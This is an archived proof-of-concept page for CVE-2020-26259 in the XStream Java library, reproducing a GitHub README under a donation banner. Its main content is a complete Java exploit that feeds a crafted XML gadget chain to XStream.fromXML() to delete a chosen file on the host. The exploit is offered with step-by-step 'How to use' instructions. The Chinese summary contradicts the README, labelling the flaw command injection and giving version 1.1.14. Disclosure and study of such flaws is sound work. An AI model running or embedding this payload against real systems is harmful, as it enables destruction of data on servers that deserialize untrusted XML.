Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-26259 PoC — XStream 操作系统命令注入漏洞

Source
https://github.com/Al1ex/CVE-2020-26259
Associated Vulnerability
Title:XStream 操作系统命令注入漏洞 (CVE-2020-26259)
Description:XStream是XStream(Xstream)团队的一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 1.1.14版本及之前版本操作系统存在操作系统命令注入漏洞。该漏洞可能允许远程攻击者删除主机上的任意已知文件作为日志。
Description
CVE-2020-26259 &&XStream Arbitrary File Delete
Readme
## Description

XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.

## Influence

Xstream <= 1.4.14

## How  to use

Step 1:Prepare a test file which will to be deleted in the future

![img](img/file.png)

Step 2: POC

~~~java
import com.thoughtworks.xstream.XStream;

public class CVE_2020_26259 {
    public static void main(String[] args) {
        String xml_poc = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "            <contentType>text/plain</contentType>\n" +
                "            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\n" +
                "              <tempFile>C:\\Al1ex.txt</tempFile>\n" +
                "            </is>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "      </value>\n" +
                "    </jdk.nashorn.internal.objects.NativeString>\n" +
                "    <string>test</string>\n" +
                "  </entry>\n" +
                "</map>";

        XStream xstream = new XStream();
        xstream.fromXML(xml_poc);
    }

}
~~~

Result:

![result](img/result.jpg)



## Reference

https://x-stream.github.io/CVE-2020-26259.html
File Snapshot

 [4.0K]  /data/pocs/b5c1f4dcae06364b81f9bbb0a58d890bc00d9c2e
├── [4.0K]  img
│   ├── [ 18K]  file.png
│   └── [245K]  result.jpg
└── [1.8K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.